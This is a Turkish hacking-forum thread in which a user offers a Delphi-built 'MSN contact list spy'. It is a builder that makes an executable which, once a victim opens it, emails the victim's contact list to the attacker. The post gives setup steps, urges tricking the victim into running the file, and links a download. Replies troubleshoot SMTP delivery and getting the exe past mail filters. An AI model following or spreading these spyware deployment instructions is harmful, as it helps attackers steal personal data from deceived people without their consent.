karakutu Msn-kontak lis. Casusu beta 0.1

karakutu

New member
Reaction score
0
karakutu Msn-kontak listesi Casusu beta 0.1

soru: Ne işe yarar

Cevap: hiç bi işe yaramaz ego tatmin etmekden başka, karşı tarafa exeyi yolluyorsunuz , açtığızaman tamam, yeniden dene , iptal uyarısı çıkıcak 3ünden birisine basarsa kişilistesi size mail olarak gelicek.

soru: peki nasıl yapıcam bunu?

Cevap :

1. adım
editörü aç
E-posta kısmına SMTP sini bildiğin sana ait olan bir mail adresi yaz
SMTP kısmına kullandığın mail adresinin SMTP sini yaz

2. adım
Sever’i aç tuşuna bas, "msn.exe" i seç , kaydet... :)) bu kadar
ardından msn.exe bi şakilde kurbana yedir , karşı tarafın msn kişi listesi sana gelsin .

soru: pekiya cevap benden başkasına gidiyormu?

cevap: Katiyen hayır...

soru: başka varmı bunlardan ?

cevap: İlk ve Tek Türkiyede hatta abaratalım Dünyada :))

soru : peki ya nerden indirebilirim ?

cevap: elbette türk upload sitesinden http://www.turkupload.com/file.asp?fid=20DA521D209AEDA1

bunun üstüne bir şey sormazsınız herhalde "abi anlamadım" gibisinden

kodlayan: karakutu

platform: Delphi

kaynaklar: Delphiturk,opensc.ws

not: yazılımı indirdikden sonra antivirüs taramasından geçirin

çalışıp / çalışmadığını Test Etmedim.

ama antivirüs taraması olumlu yönde.

teşkkürLer.

saol :) ,20 yi aşkın gönüllü testter üstünde denendi sadece 1 kere boş mail geldi oda kişi listesini oluşturamadan mail attığı içindi . onun dışında hiç bir problem olmadı . bende teşekkür ederim.

SüVaRi' Alıntı:

Email gonderme protokoludr (Simple Mail Transfer Protocol) email gondrmek icin sunucu ile istemci arasındaki iletisim şeklini belirleyen protokldr..

Ayrintili bilgi icn Burdan Smtp Kısmını Okuyabilirsin

SüVaRi' Alıntı:
Slaughter gereken anlatımı yapmış , bende dipnot düşeyim SMTP örnekleri var eğer rar'ın içindenki text dosyaysını okusaydın anlardın zaten :D

SüVaRi' Alıntı:
tamam ya kızmayın :p textin içinde hotmail içim smtp yok??
yok babacan kızma değil de hotmail'in SMTP sini bulsan bile bambaşka bir sistem ile çalışıyor o yani hotmail de olmuyor kasma boşver :)

server i olusturduktan sora deistirrsen bisi olmaz o sadece olusturdugunun server oldugu belli olsn die .)

Slaughter' Alıntı:
server i olusturduktan sora deistirrsen bisi olmaz o sadece olusturdugunun server oldugu belli olsn die .)

Tamam Sağolasın. Ben Denedim1. de oLduda 2. de Olmadı SMTP yi Dosya'da Verildiği Gibi Yaptım (gmail) 1. de geldi 2. de gelmedi Sanırım Kişi Listesinden Kaynaklanıyor Değil mi?

PRotype' Alıntı:
Peki senin Başlığa Baktım SMTP ile ilgili olanda.. Nasıl SMTP Adresi Bulunur Hala Anlamış Değilim.. :hhter :hhter

o baslkta sorarsn daha ii olr arkdsn basligini kirletmeyelm..

PRotype' Alıntı:
Tamam Sağolasın. Ben Denedim1. de oLduda 2. de Olmadı SMTP yi Dosya'da Verildiği Gibi Yaptım (gmail) 1. de geldi 2. de gelmedi Sanırım Kişi Listesinden Kaynaklanıyor Değil mi?

eğer boş mail gelirse ki bazen oluyor çok nadir, oda kişi listesini oluşturamadan maili sallladığı içindir ,
2. bir olasıklık ise arda arda açılırsa ki 2. vce3. socket out hatası vermesi muhtemeldir ama ilk açıdlığında kuşkusuz mail yerine ulaşacaktır .

karakutu' Alıntı:
eğer boş mail gelirse ki bazen oluyor çok nadir, oda kişi listesini oluşturamadan maili sallladığı içindir ,
2. bir olasıklık ise arda arda açılırsa ki 2. vce3. socket out hatası vermesi muhtemeldir ama ilk açıdlığında kuşkusuz mail yerine ulaşacaktır .

Şimdi hiç Mail Gelmiyor? Yediriyorum Ama Gelmiyor.. SMTP Olarak Notpad in içindekileri yazdım Ama yine oLmuyor Gmail'i kullanıyorum gelmiyor..

kessin ama kessin bir yerde yanlışlık yapıyorsun "kessin" gelmeme gibi bir ihtimali var oda ilkini yollar 2. de dediğim gibi socket out hatası veriri oda bağlantı yı tamamlamadan 2. bir bağlantı sağlamaya çalıştığı için...

ya bu programı zaten hiç bir mail server göndermiyor.

bu programı kurduğum klasör de silinmiyor. bi program bunu kullanıyor diyor. kendisi virüs olabilir!

vegas1' Alıntı:
ya bu programı zaten hiç bir mail server göndermiyor.

bu programı kurduğum klasör de silinmiyor. bi program bunu kullanıyor diyor. kendisi virüs olabilir!

bana bunu ispatla kendimi eşşek yerine koyup üstüme bindircem sizi tamamı , boş boş konuşma akıllı çocuk...

bide hiç bir mail serverv bu programı göndrmiyor demişsin , bunu anlamadım ...
popüler mail servervler zaten güvenlik amacı ile "ex" uzantısını otomatikmen engelliyor bunu bi kavra ardından , artık yedirip yedirememek senin problemin..
ama programı kendi misyonundan uzaklaştırıp işi .neliğe dökersen çok ayıp etmiş olursun !

Geri